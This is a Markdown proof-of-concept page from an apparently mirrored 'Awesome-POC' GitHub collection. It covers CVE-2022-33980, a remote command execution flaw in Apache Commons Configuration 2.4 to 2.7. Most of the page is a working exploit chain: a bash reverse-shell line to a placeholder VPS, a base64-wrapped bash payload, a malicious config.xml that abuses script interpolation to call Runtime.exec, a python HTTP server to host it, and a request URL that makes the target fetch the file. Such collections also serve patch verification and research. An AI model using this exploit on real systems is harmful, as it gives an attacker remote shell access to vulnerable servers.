admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 02:37:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/开发框架漏洞/Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980.md

46 lines
1.2 KiB
Markdown
Raw Permalink Normal View History

update
2024-11-06 14:10:36 +08:00
# Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980
## 漏洞描述
Apache Commons Configuration 是 Apache 基金会下的一个开源项目组件。它提供了一种通用的方式,让 Java 开发者可以使用统一的接口读取不同类型的配置文件。
该漏洞是由于 Apache Commons Configuration 提供的 Configuration 变量解释功能存在缺陷,攻击者可利用该漏洞在特定情况下,构造恶意数据执行远程代码。
## 漏洞影响
```
2.4 <= Apache Commons Configuration <=2.7
```
## 漏洞复现
java payload
```
# bash -i >& /dev/tcp/your-vps-ip/port 0>&1
bash -c {echo,<YOUR_PAYLOAD_HERE>}|{base64,-d}|{bash,-i}
```
config.xml
```
<?xml version="1.0" encoding="ISO-8859-1" ?>
<configuration>
<path>${script:js:java.lang.Runtime.getRuntime().exec("bash -c {echo,<YOUR_PAYLOAD_HERE>}|{base64,-d}|{bash,-i}")}</path>
</configuration>
```
vps 开启 8888 端口托管 config.xml
```
python -m http.server 8888
```
poc
```
http://vuln-ip/Url?url=http://your-vps-ip:8888/config.xml&data=path
```
![](images/Apache%20Commons%20Configuration%20远程命令执行漏洞%20CVE-2022-33980/image-20240126181851899.png)
Reference in New Issue Copy Permalink